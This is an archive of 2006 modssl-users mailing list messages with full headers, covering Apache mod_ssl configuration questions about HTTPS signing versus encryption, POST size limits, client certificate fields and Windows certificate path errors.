Content-Type: multipart/alternative; boundary="0-1328011060-1140804579=:74674"
Content-Transfer-Encoding: 8bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Arjun Khanna 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

--0-1328011060-1140804579=:74674
Content-Type: text/plain; charset=iso-8859-1
Content-Transfer-Encoding: 8bit

Hi:
My question relates to the possibility of selectively enabling digital encryption vs. digital signing when using the mod_ssl with Apache 2.0. 
   
  The motivation for the tradeoff is due to performance.
   
  So ideally, we might want to enable a client to login using a secure form over https that would be encrypted.
   
  However, once logged in, the subsequent client requests [for documents] could be served up using digital signing. Encryption may not be strictly required.
   
  I was wondering if it would be possible to install mod_ssl, Apache2.0, a thwate/Verisign server certificate and be able to serve the login form over https/encryption and the subsequent documents over digital signatures.
   
  If this is possible, could you pl. point me, or tell me what I'd need to do in terms of the configuration file?
   
  Thanks in Advance.
   
  Arjun Khanna.

		
---------------------------------
Relax. Yahoo! Mail virus scanning helps detect nasty viruses!
--0-1328011060-1140804579=:74674
Content-Type: text/html; charset=iso-8859-1
Content-Transfer-Encoding: 8bit


Hi:
My question relates to the possibility of selectively enabling digital encryption vs. digital signing when using the mod_ssl with Apache 2.0. 
  
 
  
The motivation for the tradeoff is due to performance.
  
 
  
So ideally, we might want to enable a client to login using a secure form over https that would be encrypted.
  
 
  
However, once logged in, the subsequent client requests [for documents] could be served up using digital signing. Encryption may not be strictly required.
  
 
  
I was wondering if it would be possible to install mod_ssl, Apache2.0, a thwate/Verisign server certificate and be able to serve the login form over https/encryption and the subsequent documents over digital signatures.
  
 
  
If this is possible, could you pl. point me, or tell me what I'd need to do in terms of the configuration file?
  
 
 
 
Thanks in Advance.
  
 
  
Arjun Khanna.

		
Relax. Yahoo! Mail 
virus scanning helps detect nasty viruses!
--0-1328011060-1140804579=:74674--
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Feb 24 19:53:54 2006
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id C3D4114D862; Fri, 24 Feb 2006 19:53:54 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from mortirolo.izoard.com (izoard.dslbr.toad.net [66.159.78.212])
	by master.modssl.org (Postfix) with ESMTP id 5337F14D82D
	for ; Fri, 24 Feb 2006 19:53:53 +0100 (CET)
Received: from apache by mortirolo.izoard.com with local (Exim 4.50)
	id 1FCiaT-0002Ln-0A
	for modssl-users@modssl.org; Fri, 24 Feb 2006 14:26:45 -0500
Received: from 214.3.116.1
        (SquirrelMail authenticated user ams)
        by www.izoard.com with HTTP;
        Fri, 24 Feb 2006 14:26:44 -0500 (EST)
Message-ID: <50030.214.3.116.1.1140809204.squirrel@www.izoard.com>
In-Reply-To: <20060224180939.74960.qmail@web51801.mail.yahoo.com>
References: <20060224180939.74960.qmail@web51801.mail.yahoo.com>
Date: Fri, 24 Feb 2006 14:26:44 -0500 (EST)
Subject: Re: digital signing vs. full encryption.
From: ams@izoard.com
To: modssl-users@modssl.org
User-Agent: SquirrelMail/1.4.2
MIME-Version: 1.0
Content-Type: text/plain;charset=iso-8859-1
Content-Transfer-Encoding: 8bit
X-Priority: 3
Importance: Normal
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: ams@izoard.com
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

> Hi:
> My question relates to the possibility of selectively enabling digital
> encryption vs. digital signing when using the mod_ssl with Apache 2.0.
>
>   The motivation for the tradeoff is due to performance.
>
>   So ideally, we might want to enable a client to login using a secure
> form over https that would be encrypted.
>
>   However, once logged in, the subsequent client requests [for documents]
> could be served up using digital signing. Encryption may not be strictly
> required.
>
>   I was wondering if it would be possible to install mod_ssl, Apache2.0, a
> thwate/Verisign server certificate and be able to serve the login form
> over https/encryption and the subsequent documents over digital
> signatures.
>
>   If this is possible, could you pl. point me, or tell me what I'd need to
> do in terms of the configuration file?
>

mod_ssl implement Secure SOCKET Layer, you want HTTP with digital
signature, which is something quite different. Look into web services,
they probably have something like what you're after.

-a
-- 
Aaron Stromas          |     "Tik-tik-tik!!!... ja, Pantani is weg..."
mailto:ams@izoard.com  |                          BRTN commentator
+1 (301) 493 4933      |                          L'Alpe d'Huez
http://www.izoard.com  |                          1995 Tour de France




______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Feb 27 13:02:08 2006
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id DCF3614D9A2; Mon, 27 Feb 2006 13:02:08 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from nproxy.gmail.com (nproxy.gmail.com [64.233.182.200])
	by master.modssl.org (Postfix) with ESMTP id 62EE714D82C
	for ; Mon, 27 Feb 2006 13:02:07 +0100 (CET)
Received: by nproxy.gmail.com with SMTP id l37so638248nfc
        for ; Mon, 27 Feb 2006 04:02:05 -0800 (PST)
DomainKey-Signature: a=rsa-sha1; q=dns; c=nofws;
        s=beta; d=gmail.com;
        h=received:message-id:date:from:to:subject:mime-version:content-type;
        b=s6CtBEFCQt9owlwCzTMNFUp1K/caNZXRVDd0keevxnT4gby1avJClsH+pzY1tGXtrnseA27Z9m20fxy/whNbeCIZsupkMryicwGk4Ur7wfZm+pE/45uKAv58efao0duFdZ7BpRXaZIDs5+D6O3q6R/qXI1RQdUcXjo4xWLzFLmo=
Received: by 10.49.2.4 with SMTP id e4mr123657nfi;
        Mon, 27 Feb 2006 03:55:52 -0800 (PST)
Received: by 10.48.242.10 with HTTP; Mon, 27 Feb 2006 03:55:52 -0800 (PST)
Message-ID: <6d60515a0602270355n445c6141i53c62702b19f36e2@mail.gmail.com>
Date: Mon, 27 Feb 2006 19:55:52 +0800
From: "Yves Sy" 
To: modssl-users@modssl.org
Subject: HTTPS max post size?
MIME-Version: 1.0
Content-Type: multipart/alternative; 
	boundary="----=_Part_1306_8248624.1141041352874"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Yves Sy" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

------=_Part_1306_8248624.1141041352874
Content-Type: text/plain; charset=ISO-8859-1
Content-Transfer-Encoding: quoted-printable
Content-Disposition: inline

Hello everyone,

I'm currently configuring an Apache reverse-proxy which delegates to an SAP
J2EE Engine bakc-end.

Everything works fine in HTTP mode, but with HTTPS mode, one of the large
pages (~512Kb) fails, i.e. I simply get sent back to the page I'm trying to
post.

Is there such a setting for max post size in HTTPS?


Thanks,
-Yves-

--
A bus station is where a bus stops. A train station is where a train stops.
On my desk I have a work station...

------=_Part_1306_8248624.1141041352874
Content-Type: text/html; charset=ISO-8859-1
Content-Transfer-Encoding: quoted-printable
Content-Disposition: inline

Hello everyone,



I'm currently configuring an Apache reverse-proxy which delegates to an SAP=
 J2EE Engine bakc-end.



Everything works fine in HTTP mode, but with HTTPS mode, one of the
large pages (~512Kb) fails, i.e. I simply get sent back to the page I'm
trying to post.



Is there such a setting for max post size in HTTPS?





Thanks,

-Yves-

-- 
A bus station is where a bus stops. A tr=
ain station is where a train stops. On my desk I have a work station...

------=_Part_1306_8248624.1141041352874--
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Sun Mar  5 17:14:50 2006
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 7DBE914D83E; Sun,  5 Mar 2006 17:14:50 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from babylon.hostgo.com (babylon.hostgo.com [65.19.169.34])
	by master.modssl.org (Postfix) with ESMTP id 0573D14D82C
	for ; Sun,  5 Mar 2006 17:14:49 +0100 (CET)
Received: from 222.red-81-47-9.staticip.rima-tde.net ([81.47.9.222] helo=exp.productshome.com)
	by babylon.hostgo.com with esmtp (Exim 4.52)
	id 1FFvsY-0005ar-61
	for modssl-users@modssl.org; Sun, 05 Mar 2006 11:14:44 -0500
Subject: How to extract CN and other X509v3 data?
From: Fran 
To: modssl-users@modssl.org
Content-Type: text/plain
Date: Sun, 05 Mar 2006 13:03:10 +0000
Message-Id: <1141563791.3598.12.camel@localhost>
Mime-Version: 1.0
X-Mailer: Evolution 2.4.2.1 (2.4.2.1-3.9.el4.lpt) 
Content-Transfer-Encoding: 7bit
X-AntiAbuse: This header was added to track abuse, please include it with any abuse report
X-AntiAbuse: Primary Hostname - babylon.hostgo.com
X-AntiAbuse: Original Domain - modssl.org
X-AntiAbuse: Originator/Caller UID/GID - [47 12] / [47 12]
X-AntiAbuse: Sender Address Domain - yobinario.com
X-Source: 
X-Source-Args: 
X-Source-Dir: 
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Fran 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Hello,
I need extract client certificate info from client certificate that
mod_ssl verifies and pass to another module.

Any easy way to make this?

Thanks in advance.



______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Mar  8 17:51:29 2006
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id BA15514D847; Wed,  8 Mar 2006 17:51:29 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from lapis.engin.umich.edu (lapis.engin.umich.edu [141.213.74.22])
	by master.modssl.org (Postfix) with ESMTP id 2780D14D82A
	for ; Wed,  8 Mar 2006 17:51:28 +0100 (CET)
Received: from localhost (localhost [127.0.0.1])
	by lapis.engin.umich.edu (8.13.5/8.13.5) with ESMTP id k28GpPZ1029260
	for ; Wed, 8 Mar 2006 11:51:25 -0500 (EST)
Date: Wed, 8 Mar 2006 11:51:25 -0500 (EST)
From: Asad Habib 
To: modssl-users@modssl.org
Subject: Apache with SSL Issue
Message-ID: 
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII; format=flowed
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Asad Habib 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Hello. I am running Windows XP and I am trying to make Apache2 run with 
mod_ssl. I have a certificate file and certificate key file in place but 
when I run Apache I get the following error:

Syntax error on line 973 of C:/Program Files/Apache2/conf/httpd.conf
SSLCertificateFile: file 'C:/conf/ssl/servername.cert' does not exist or 
is empty

The code for my virtual host directive is as follows:


    SSLEngine On
    SSLCertificateFile /conf/ssl/servername.cert
    SSLCertificateKeyFile /conf/ssl/servername.key


I lot of folks have had similar problems as I found out through Google, 
but I have not come across any viable solutions. Your help would be 
appreciated. Thanks.

- Asad
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Mar  8 17:58:04 2006
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 4D2C414D847; Wed,  8 Mar 2006 17:58:04 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from lemonlainey.com (dsl-217-155-103-132.zen.co.uk [217.155.103.132])
	by master.modssl.org (Postfix) with ESMTP id EFF0F14D82A
	for ; Wed,  8 Mar 2006 17:58:03 +0100 (CET)
DKIM-Signature: a=rsa-sha1; c=nowsp; d=netsmith.ltd.uk;
	s=MDaemon; t=1141837079; x=1142441879; i=kevin@netsmith.ltd.uk;
	q=dns; h=DomainKey-Signature:Received:Message-ID:Date:From:
	Reply-To:Organization:User-Agent:MIME-Version:To:Subject:
	References:In-Reply-To:Content-Type:Content-Transfer-Encoding;
	b=jVfhlimn0LlCi20O061DcfYIYZ4HmXjq/fsJiReqSWoTqWyFJ3VpkW9wfT2RYwIg
	Oa/o84HmNDHYkYrA7hlthQwQ8daIZDIKVwy14qokF1f0wwWMlL/3Fd2xDN8eJEPT
	Vp//9BfjbHugqF16PChx9WMcS1RYeYjBKeQAfTQOfmg=
DomainKey-Signature: a=rsa-sha1; s=MDaemon; d=netsmith.ltd.uk;
	c=simple; q=dns; h=from:message-id;
	b=VjP4Utfq59StP0hw/mAL0nz5sMfNo6lSyeGlIbhYIOyfcnrOvKPKggR5S8fT5zEFPV6vwg+0T0A6eXPr/vLv5t5X74yov4FvIwma6ZinmrOGZLPWH2uYGc8A9/+7fKVxEnGB8Q8Cw7nYx7JQ5Zsu8/WjkJY/n/U8xmxXnxyS/8k=;
Received: from [217.155.103.138] by lemonlainey.com
	(Cipher TLSv1:RC4-MD5:128) (MDaemon.PRO.v8.1.4.R)
	with ESMTP id md50000285761.msg
	for ; Wed, 08 Mar 2006 16:57:58 +0000
Message-ID: <440F0D14.3040809@netsmith.ltd.uk>
Date: Wed, 08 Mar 2006 16:57:56 +0000
From: Kevin Smith 
Organization: Netsmith Limited
User-Agent: Thunderbird 1.5 (Windows/20051201)
MIME-Version: 1.0
To:  modssl-users@modssl.org
Subject: Re: Apache with SSL Issue
References: 
In-Reply-To: 
Content-Type: text/plain; charset=ISO-8859-1; format=flowed
Content-Transfer-Encoding: 7bit
X-Authenticated-Sender: kevin@netsmith.ltd.uk
X-HashCash: 1:20:060308:modssl-users@modssl.org::m61WlkoWZexz6yGI:000000000000000000000000000000000000007m3D
X-Spam-Processed: lemonlainey.com, Wed, 08 Mar 2006 16:57:59 +0000
	(not processed: message from valid local sender)
X-Return-Path: kevin@netsmith.ltd.uk
X-MDaemon-Deliver-To: modssl-users@modssl.org
X-MDAV-Processed: lemonlainey.com, Wed, 08 Mar 2006 16:57:59 +0000
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Kevin Smith 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Well, I think as Apache2 is the root, you path is wrong for the 
certificate file, as the error shows, you config should be as follows:


   SSLEngine On
   SSLCertificateFile conf/ssl/servername.cert
   SSLCertificateKeyFile conf/ssl/servername.key


Regards,

Kevin

Asad Habib wrote:
> Hello. I am running Windows XP and I am trying to make Apache2 run 
> with mod_ssl. I have a certificate file and certificate key file in 
> place but when I run Apache I get the following error:
>
> Syntax error on line 973 of C:/Program Files/Apache2/conf/httpd.conf
> SSLCertificateFile: file 'C:/conf/ssl/servername.cert' does not exist 
> or is empty
>
> The code for my virtual host directive is as follows:
>
> 
>    SSLEngine On
>    SSLCertificateFile /conf/ssl/servername.cert
>    SSLCertificateKeyFile /conf/ssl/servername.key
> 
>
> I lot of folks have had similar problems as I found out through 
> Google, but I have not come across any viable solutions. Your help 
> would be appreciated. Thanks.
>
> - Asad
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Mar  8 18:08:37 2006
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 923F514D83F; Wed,  8 Mar 2006 18:08:37 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from lapis.engin.umich.edu (lapis.engin.umich.edu [141.213.74.22])
	by master.modssl.org (Postfix) with ESMTP id 1474F14D82A
	for ; Wed,  8 Mar 2006 18:08:33 +0100 (CET)
Received: from localhost (localhost [127.0.0.1])
	by lapis.engin.umich.edu (8.13.5/8.13.5) with ESMTP id k28H8T5M029847;
	Wed, 8 Mar 2006 12:08:30 -0500 (EST)
Date: Wed, 8 Mar 2006 12:08:29 -0500 (EST)
From: Asad Habib 
To: Kevin Smith 
cc: modssl-users@modssl.org
Subject: Re: Apache with SSL Issue
In-Reply-To: <440F0D14.3040809@netsmith.ltd.uk>
Message-ID: 
References: 
 <440F0D14.3040809@netsmith.ltd.uk>
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII; format=flowed
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Asad Habib 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Hello. Thanks for your input. I have tried your suggestion already and it 
yielded the same Syntax error as mentioned below and the 
SSLCertificateFile error was as follows:

SSLCertificateFile: Invalid file path conf/ssl/servername.cert

- Asad



On Wed, 8 Mar 2006, Kevin Smith wrote:

> Well, I think as Apache2 is the root, you path is wrong for the certificate 
> file, as the error shows, you config should be as follows:
>
> 
>  SSLEngine On
>  SSLCertificateFile conf/ssl/servername.cert
>  SSLCertificateKeyFile conf/ssl/servername.key
> 
>
> Regards,
>
> Kevin
>
> Asad Habib wrote:
>> Hello. I am running Windows XP and I am trying to make Apache2 run with 
>> mod_ssl. I have a certificate file and certificate key file in place but 
>> when I run Apache I get the following error:
>> 
>> Syntax error on line 973 of C:/Program Files/Apache2/conf/httpd.conf
>> SSLCertificateFile: file 'C:/conf/ssl/servername.cert' does not exist or is 
>> empty
>> 
>> The code for my virtual host directive is as follows:
>> 
>> 
>>    SSLEngine On
>>    SSLCertificateFile /conf/ssl/servername.cert
>>    SSLCertificateKeyFile /conf/ssl/servername.key
>> 
>> 
>> I lot of folks have had similar problems as I found out through Google, but 
>> I have not come across any viable solutions. Your help would be 
>> appreciated. Thanks.
>> 
>> - Asad
>> ______________________________________________________________________
>> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
>> User Support Mailing List                      modssl-users@modssl.org
>> Automated List Manager                            majordomo@modssl.org
>
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
>
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Mar  8 18:14:14 2006
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 9873814D83F; Wed,  8 Mar 2006 18:14:14 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from lemonlainey.com (dsl-217-155-103-132.zen.co.uk [217.155.103.132])
	by master.modssl.org (Postfix) with ESMTP id DE1BA14D82A
	for ; Wed,  8 Mar 2006 18:14:13 +0100 (CET)
DKIM-Signature: a=rsa-sha1; c=nowsp; d=netsmith.ltd.uk;
	s=MDaemon; t=1141838050; x=1142442850; i=kevin@netsmith.ltd.uk;
	q=dns; h=DomainKey-Signature:Received:Message-ID:Date:From:
	Reply-To:Organization:User-Agent:MIME-Version:To:Subject:
	References:In-Reply-To:Content-Type:Content-Transfer-Encoding;
	b=v4zbGkOD+SbgfhHj/oBmGDSFopAK+1nMy4F/szgC+zSO+Z2U90AvISB83/meaeOh
	JLz73tmKclwUSidnLCrAD7uIpgJPiUGsaO+ZGbKn8L+dP08SiL9EFyhWQBAyLKJi
	Bvxk5AZFtxSB52CGQMaNjYcyXiFmnDccg44awVAHPvM=
DomainKey-Signature: a=rsa-sha1; s=MDaemon; d=netsmith.ltd.uk;
	c=simple; q=dns; h=from:message-id;
	b=AZ+e9mk10kl6N/ag2+q19MWqYKZvDaCFrMk1gfByQnhW62nvUuBdCiEc3SP2N/1fX6dIMCFU00tofDnlKf5a/G33ZXysyE7AYGT2LVxjS8RWKcp1fpCzcmqogUuwF2v8yAQl3iLPA2wVcRDozf90Ej71qXLsOZbmP8bYsf+v3Cc=;
Received: from [217.155.103.138] by lemonlainey.com
	(Cipher TLSv1:RC4-MD5:128) (MDaemon.PRO.v8.1.4.R)
	with ESMTP id md50000285774.msg
	for ; Wed, 08 Mar 2006 17:14:09 +0000
Message-ID: <440F10DD.503@netsmith.ltd.uk>
Date: Wed, 08 Mar 2006 17:14:05 +0000
From: Kevin Smith 
Organization: Netsmith Limited
User-Agent: Thunderbird 1.5 (Windows/20051201)
MIME-Version: 1.0
To:  modssl-users@modssl.org
Subject: Re: Apache with SSL Issue
References:  <440F0D14.3040809@netsmith.ltd.uk> 
In-Reply-To: 
Content-Type: text/plain; charset=ISO-8859-1; format=flowed
Content-Transfer-Encoding: 7bit
X-Authenticated-Sender: kevin@netsmith.ltd.uk
X-HashCash: 1:20:060308:modssl-users@modssl.org::5PsYWI/qBydB2rsm:000000000000000000000000000000000000002Npo
X-Spam-Processed: lemonlainey.com, Wed, 08 Mar 2006 17:14:09 +0000
	(not processed: message from valid local sender)
X-Return-Path: kevin@netsmith.ltd.uk
X-MDaemon-Deliver-To: modssl-users@modssl.org
X-MDAV-Processed: lemonlainey.com, Wed, 08 Mar 2006 17:14:10 +0000
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Kevin Smith 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Probably the best think to do is add the absolute path to the files as:

 SSLCertificateFile C:/Program Files/Apache2/conf/ssl/servername.cert
 SSLCertificateKeyFile C:/Program Files/Apache2/conf/ssl/servername.key

The above paths are assumed to be correct.

Kevin

Asad Habib wrote:
> Hello. Thanks for your input. I have tried your suggestion already and 
> it yielded the same Syntax error as mentioned below and the 
> SSLCertificateFile error was as follows:
>
> SSLCertificateFile: Invalid file path conf/ssl/servername.cert
>
> - Asad
>
>
>
> On Wed, 8 Mar 2006, Kevin Smith wrote:
>
>> Well, I think as Apache2 is the root, you path is wrong for the 
>> certificate file, as the error shows, you config should be as follows:
>>
>> 
>>  SSLEngine On
>>  SSLCertificateFile conf/ssl/servername.cert
>>  SSLCertificateKeyFile conf/ssl/servername.key
>> 
>>
>> Regards,
>>
>> Kevin
>>
>> Asad Habib wrote:
>>> Hello. I am running Windows XP and I am trying to make Apache2 run 
>>> with mod_ssl. I have a certificate file and certificate key file in 
>>> place but when I run Apache I get the following error:
>>>
>>> Syntax error on line 973 of C:/Program Files/Apache2/conf/httpd.conf
>>> SSLCertificateFile: file 'C:/conf/ssl/servername.cert' does not 
>>> exist or is empty
>>>
>>> The code for my virtual host directive is as follows:
>>>
>>> 
>>>    SSLEngine On
>>>    SSLCertificateFile /conf/ssl/servername.cert
>>>    SSLCertificateKeyFile /conf/ssl/servername.key
>>> 
>>>
>>> I lot of folks have had similar problems as I found out through 
>>> Google, but I have not come across any viable solutions. Your help 
>>> would be appreciated. Thanks.
>>>
>>> - Asad
>>> ______________________________________________________________________
>>> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
>>> User Support Mailing List                      modssl-users@modssl.org
>>> Automated List Manager                            majordomo@modssl.org
>>
>> ______________________________________________________________________
>> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
>> User Support Mailing List                      modssl-users@modssl.org
>> Automated List Manager                            majordomo@modssl.org
>>
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Mar  8 18:29:36 2006
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id D2AD014D83F; Wed,  8 Mar 2006 18:29:36 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from mailprimary.werum.de (mailprimary.werum.de [62.156.157.73])
	by master.modssl.org (Postfix) with ESMTP id A80CB14D82A
	for ; Wed,  8 Mar 2006 18:29:36 +0100 (CET)
Received: from werum815.werum.net (werum815.werum.net [172.20.104.15])
	by mailprimary.werum.de (Postfix) with ESMTP id 20E28F93F5
	for ; Wed,  8 Mar 2006 18:34:06 +0100 (CET)
Received: from localhost (unknown [192.168.1.3])
	by werum815.werum.net (Postfix) with ESMTP id E68FF932DE;
	Wed,  8 Mar 2006 18:29:29 +0100 (CET)
Received: from werum815.werum.net ([192.168.1.1])
 by localhost (mailclaw.werum.net [192.168.1.3]) (amavisd-new, port 10024)
 with ESMTP id 31846-06; Wed,  8 Mar 2006 18:28:16 +0100 (CET)
Received: from [172.20.103.158] (werum758.werum.net [172.20.103.158])
	by werum815.werum.net (Postfix) with ESMTP id 7D512932C8
	for ; Wed,  8 Mar 2006 18:29:29 +0100 (CET)
Message-ID: <440F1471.4020804@werum.de>
Date: Wed, 08 Mar 2006 18:29:21 +0100
From: Eckard Wille 
User-Agent: Thunderbird 1.5 (Windows/20051201)
MIME-Version: 1.0
To: modssl-users@modssl.org
Subject: Re: Apache with SSL Issue
References:  <440F0D14.3040809@netsmith.ltd.uk>  <440F10DD.503@netsmith.ltd.uk>
In-Reply-To: <440F10DD.503@netsmith.ltd.uk>
X-Enigmail-Version: 0.94.0.0
Content-Type: text/plain; charset=ISO-8859-1
Content-Transfer-Encoding: 7bit
X-Virus-Scanned: amavisd-new at werum.net
X-Spam-Status: No, hits=-5.881 tagged_above=-999 required=5 tests=ALL_TRUSTED,
 AWL, BAYES_00
X-Spam-Level: 
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Eckard Wille 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Kevin Smith schrieb:
> Probably the best think to do is add the absolute path to the files as:
> 
> SSLCertificateFile C:/Program Files/Apache2/conf/ssl/servername.cert
> SSLCertificateKeyFile C:/Program Files/Apache2/conf/ssl/servername.key

If this still does not work try to surround the path with " ", like this:

> SSLCertificateFile "C:/Program Files/Apache2/conf/ssl/servername.cert"  
> SSLCertificateKeyFile "C:/Program Files/Apache2/conf/ssl/servername.key"

Or, even better, put the Apache on a spare unix/linux box. Configuring
apache/tomcat/mod_jk/whatever is more straightforward there than on a
windows box.

Greetings from Germany,
Eckard
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Mar  8 18:37:09 2006
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 8020E14D83F; Wed,  8 Mar 2006 18:37:09 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from lapis.engin.umich.edu (lapis.engin.umich.edu [141.213.74.22])
	by master.modssl.org (Postfix) with ESMTP id E6DF014D82A
	for ; Wed,  8 Mar 2006 18:37:08 +0100 (CET)
Received: from localhost (localhost [127.0.0.1])
	by lapis.engin.umich.edu (8.13.5/8.13.5) with ESMTP id k28Hb4jR001661;
	Wed, 8 Mar 2006 12:37:04 -0500 (EST)
Date: Wed, 8 Mar 2006 12:37:04 -0500 (EST)
From: Asad Habib 
To: Kevin Smith 
cc: modssl-users@modssl.org
Subject: Re: Apache with SSL Issue
In-Reply-To: <440F10DD.503@netsmith.ltd.uk>
Message-ID: 
References: 
 <440F0D14.3040809@netsmith.ltd.uk> 
 <440F10DD.503@netsmith.ltd.uk>
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII; format=flowed
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Asad Habib 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Hi. Okay, I tried the absolute paths and now I am experiencing the 
following error:

SSLCertificateFile takes one argument, SSL Server Certificate file 
['/path/to/file/' - PEM or DER encoded]

What does this mean?

I also tried delimiting the paths with quotes but that yielded an invalid 
file path error.

- Asad



On Wed, 8 Mar 2006, Kevin Smith wrote:

> Probably the best think to do is add the absolute path to the files as:
>
> SSLCertificateFile C:/Program Files/Apache2/conf/ssl/servername.cert
> SSLCertificateKeyFile C:/Program Files/Apache2/conf/ssl/servername.key
>
> The above paths are assumed to be correct.
>
> Kevin
>
> Asad Habib wrote:
>> Hello. Thanks for your input. I have tried your suggestion already and it 
>> yielded the same Syntax error as mentioned below and the SSLCertificateFile 
>> error was as follows:
>> 
>> SSLCertificateFile: Invalid file path conf/ssl/servername.cert
>> 
>> - Asad
>> 
>> 
>> 
>> On Wed, 8 Mar 2006, Kevin Smith wrote:
>> 
>>> Well, I think as Apache2 is the root, you path is wrong for the 
>>> certificate file, as the error shows, you config should be as follows:
